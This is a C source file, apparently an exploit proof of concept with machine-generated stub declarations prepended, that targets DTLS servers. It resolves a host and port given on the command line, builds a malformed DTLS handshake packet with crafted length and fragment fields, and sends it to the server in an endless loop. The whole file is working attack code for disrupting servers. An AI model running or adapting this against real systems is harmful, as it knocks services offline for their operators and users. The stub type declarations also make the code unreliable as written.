
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int target ;
struct TYPE_2__ {char s_addr; } ;
struct sockaddr_in {int sin_port; TYPE_1__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {char** h_addr_list; int h_length; int h_addrtype; } ;


 int AF_INET ;
 int MAX_LEN ;
 int SOCK_DGRAM ;
 int atoi (char*) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int errno ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int printf (char*,char*,...) ;
 int put16 (char*,int) ;
 int send (int,char*,int,int ) ;
 int socket (int ,int ,int ) ;
 char* strerror (int ) ;

int
main(int argc, char **argv)
{
 int sock, ret;
 char *ptr, *err;
 struct hostent *h;
 struct sockaddr_in target;
 char buf[MAX_LEN];

 if (argc < 3) {
  err = "Pass the host and port of the target DTLS server";
  printf("[-] Error: %s\n", err);
  exit(1);
 }

 h = gethostbyname(argv[1]);
 if (!h) {
  err = "Unknown host specified";
  printf("[-] Error: %s (%s)\n", err, strerror(errno));
  exit(1);
 }

 target.sin_family = h->h_addrtype;
 memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
 target.sin_port = htons(atoi(argv[2]));

 sock = socket(AF_INET, SOCK_DGRAM, 0);
 if (sock == -1) {
  err = "Failed creating UDP socket";
  printf("[-] Error: %s (%s)\n", err, strerror(errno));
  exit(1);
 }

 ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
 if (ret == -1) {
  err = "Failed to connect socket";
  printf("[-] Error: %s (%s)\n", err, strerror(errno));
  exit(1);
 }

 ptr = buf;


 memcpy(ptr, "\x16\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00", 11);
 ptr += 11;


 put16(ptr, MAX_LEN - ((ptr - buf) + 2));
 ptr += 2;


 memcpy(ptr, "\x01", 1);
 ptr += 1;


 memcpy(ptr, "\x00", 1);
 ptr += 1;
 put16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8));
 ptr += 2;


 memcpy(ptr, "\x00\x01", 2);
 ptr += 2;


 memcpy(ptr, "\x00\x00\x00", 3);
 ptr += 3;


 memcpy(ptr, "\x00", 1);
 ptr += 1;
 put16(ptr, MAX_LEN - ((ptr - buf) + 2));
 ptr += 2;


 memset(ptr, '\x00', MAX_LEN - (ptr - buf));

 printf("[+] Firing loads of packets at %s:%s...\n", argv[1], argv[2]);

 while (1) {
  send(sock, buf, MAX_LEN, 0);
 }

 close(sock);

 return 0;
}
